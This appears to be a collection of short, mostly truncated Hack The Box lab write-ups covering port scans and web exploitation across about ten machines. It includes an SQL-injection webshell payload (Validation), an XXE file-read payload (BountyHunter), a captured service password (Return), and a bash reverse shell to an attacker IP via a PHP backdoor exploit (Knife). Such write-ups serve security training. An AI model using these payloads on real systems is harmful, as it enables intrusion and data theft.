
HTB GoodGames

$ nmap -sV -p- goodgames.htb --min-rate 5000

http://goodgames.htb/

We can test whether this site is vulnerable to SQL injection. If we just add a ', we can reach the login page with a registration form.

http://internal-administration.goodgames.htb/

We don't have credentials for this site, but as we've confirmed there is an SQL injection, let's try to exploit it. First, we need to know how many columns exist.

email=admin%40test.com' union all

HTB Swagshop

$ nmap -p- -sV 10.10.10.140

$ sudo nano /etc/hosts

Access http://swagshop.htb/

As we are facing a Magento site, we can use Magescan to check it.

$ wget https://github.com/steverobbins/magescan/releases/download/v1.12.9/magescan.phar
$ php magescan.phar scan:all http://swagshop.htb

In the Magescan report, looking at the patches, the first one listed is SUPEE-5344.

https://magento.com/security/patches/supee-5344-%E2%80%93-shoplift-bug-patch
https://blog.sucuri.net/2015/04/magento-shoplift-supee-5344-exploits-in-the-wild.html
https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py

With this PoC, you should be able to add an admin user.

$ python3 poc.py swagshop.htb

Access http://swagshop.htb/index.php/admin

The "Froghopper" Attack

After

HTB Return

$ nmap -sV -p- 10.10.11.108 -Pn --min-rate 5000

http://10.10.11.108/
http://10.10.11.108/settings.php

If we add our IP into the Server Address field:

$ sudo nc -lvnp 389

We get a connection and the svc-printer password.

svc-printer:1edFg43012!!

You can read more about this technique here.

According to the nmap scan, WinRM is available, so we can try to use Evil-WinRM to connect to the machine.

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

HTB Validation

$ nmap -p- -v 10.10.11.116

Access http://10.10.11.116

The listbox values are sent to the server in a POST request:

username=rffuste&country=Brazil

In the response, we get a user cookie. This user cookie does not change if multiple requests are performed.

SQL Injection

We can check whether there is an SQL injection. We have confirmed there is an SQL injection that we can use.

' union select "" INTO OUTFILE '/var/www/html/shell.php'-- -

Now

HTB TheNotebook

$ nmap 10.10.10.230 -A -p- -T4 -v

http://10.10.10.230/
http://10.10.10.230/register

So, a user test exists. What would be the password? test??? Do we have an admin user?

http://10.10.10.230/login

We can try to log in with our test user.

Test notes

After logging in, we can observe that there is an AUTH token. We observe that it is a JWT token. We can decode it using https://jwt.io/

Here we can observe several things:

RS256

HTB BountyHunter

$ nmap -A 10.10.11.100 -T4 -v

Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

http://10.10.11.100/
http://10.10.11.100/resources/README.txt
http://10.10.11.100/portal.php
http://10.10.11.100/log_submit.php

As we can observe in Burp, the data is URL+base64 encoded. It's XML data, so we could try an XXE.

Using CyberChef (https://gchq.github.io), on https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe we also find:

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file_to_use"> ]>

We can use it to check other files

HTB Love

$ nmap -A -p- 10.10.10.239 -T4

Open ports:
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd

HTB Knife

$ nmap 10.10.10.242
$ nmap 10.10.10.242 -p- -v

http://10.10.10.242/

$ whatweb 10.10.10.242
$ searchsploit php 8.1.0-dev
$ searchsploit -m php/webapps/49933.py
$ python3 49933.py
$ id

Using this exploit we get a reverse shell, but it is not very useful, so we can try to get a better one.

https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html

$ python3 php_8.1.0-dev_exploit.py -u http://10.10.10.242/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.7/4444 0>&1'"
$ sudo nc -lvnp 4444

james@knife:/$ ls
james@knife:/$ cd /home
james@knife:/home$ ls
james@knife:/home$

HTB Cap

$ nmap -A -p- 10.10.10.245 -T4 -Pn

Open ports:
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn

http://10.10.10.245/

Dashboard
Security Snapshot
IP Config
Network status

Security Snapshot

http://10.10.10.245/data/1

Using Burp we can discover the content of the site and check whether there is anything else under data. Using Burp's Discover functionality we can also find out whether

HTB Explore

RustScan is a fast port scanner that promises to scan all 65k ports in 3 seconds. We can use it to perform a full port scan and then use the results in combination with Nmap.

https://github.com/RustScan/RustScan

$ rustscan -a 10.10.10.247
$ sudo nmap -sV -sC 10.10.10.247 -p 2222,42135,42507,59777

In the port scan, we found several open ports. As usual, the SSH port is not a common port to start testing, so